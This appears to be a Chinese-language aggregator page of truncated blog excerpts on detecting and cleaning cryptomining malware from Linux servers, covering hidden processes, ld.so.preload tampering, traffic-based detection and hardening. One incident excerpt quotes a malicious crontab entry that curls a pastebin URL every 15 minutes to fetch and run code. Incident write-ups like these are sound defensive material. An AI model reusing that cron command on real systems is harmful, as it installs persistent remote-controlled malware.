查看哪個進程占據cup 通過 top 或者使用 ps aux 我這個通過top 命令看不到哪個進程占用了cup ,執行 cat /etc/ld.so.preload 查看,里面也加載了異常的 ...
最近很多小伙伴服務器都被挖礦了,簡單總結下在應急過程中,常遇到的一些被挖礦的特征,以及防護方法,工具后面會進行詳細的介紹分享。 問題所在 要防止被挖礦,首先要明白挖礦的本質。挖礦本質就是快速產出,利用可以利用的資源,實現快速產出,獲取收益。為什么要明白這個道理,就是因為,挖礦的人,大多不會把時間花費在你的某台服務器上,大多做法是通過網絡空間搜索引擎或端口掃描工具等,進行整個網段的批量掃描,根據掃 ...
2021-05-22 10:01 0 233 推薦指數:
查看哪個進程占據cup 通過 top 或者使用 ps aux 我這個通過top 命令看不到哪個進程占用了cup ,執行 cat /etc/ld.so.preload 查看,里面也加載了異常的 ...
前言 網上對於挖礦的檢測也有很多的專業文章,筆者在此就對網上的文章做一個匯總再加上自己的一些不太成熟的想法,歡迎各位師傅們的探討,當然,檢測的方法還是從2個方向出發,基於流量層的檢測以及主機行為的檢測 基於流量的檢測 一.流量特征對於挖礦,我們最熟悉的協議就是以太坊stratum協議 ...
記錄一次解決挖礦病毒的過程(進程:susupdate,networkservice) 目錄 1.找出病毒進程 2.根據進程號找到運行文件的位置 3.刪除病毒進程 4.刪除病毒文件 4.1 文件無法正常刪除如何解決? 5. ...
背景 根據某安全公司安全威脅檢測到在2019年中,惡意軟件攔截量為181.07億次,其中挖礦類惡意軟件感染占比最多(58%),其次為遠程木馬(占比14%),企業或組織內文件共享等機制也使得感染型病毒的比例在9%左右。惡意軟件一哥挖礦軟件攻擊勢頭非常猛,加密貨幣挖礦流量較去年增長約100%,在類型 ...
新的一天的開始 周五早上剛到公司,同事來問我系統為啥打不開了?我第一反應就是肯定 Nginx 服務器掛了唄,立馬就去登錄服務器看看,但此時發現已經完全遠程登錄不上這台部署了 Nginx 和 Redis 的服務器了,此刻心理活動如下: 難道服務器欠費了? 難道服務器到期了? 都不對阿,一起 ...
一般情況下,挖礦病毒都是自動掃描+自動掛馬生成的,並不會是有專人進行攻擊,所以也比較好清除,注意清除之后需要 check 有無后門。 最重要幾點(也可能是被hack的原因):禁止 ROOT 用戶登陸,ROOT 不能使用弱密碼,FRP 需要配置,不能使用默認選項。 挖礦進程占用的 CPU 資源 ...
上個月末,我也嘗試到了服務器被病毒入侵的滋味,正好這個月末來復盤一下。 怎么說呢,那個感覺就像是你自己的娃在外面被揍了一樣,你得想辦法為孩子出人頭地呀,是吧。於是這一波病毒反擊戰就正式上演了。 ## 一出好戲 先說一下我是怎么發現服務器被入侵的。那是在一個愉快的下班時間,我的手機端又提示收到了阿里 ...
這幾天阿里雲雲服務器cpu一直跑滿,一查發現有個定時任務,在搜索一下,發現自己中毒了,原來前幾天搞redis學習的時候設置了個弱密碼,被ssh暴力破解植入病毒了。 crontab -l*/15 * * * * (curl -fsSL https://pastebin.com/raw ...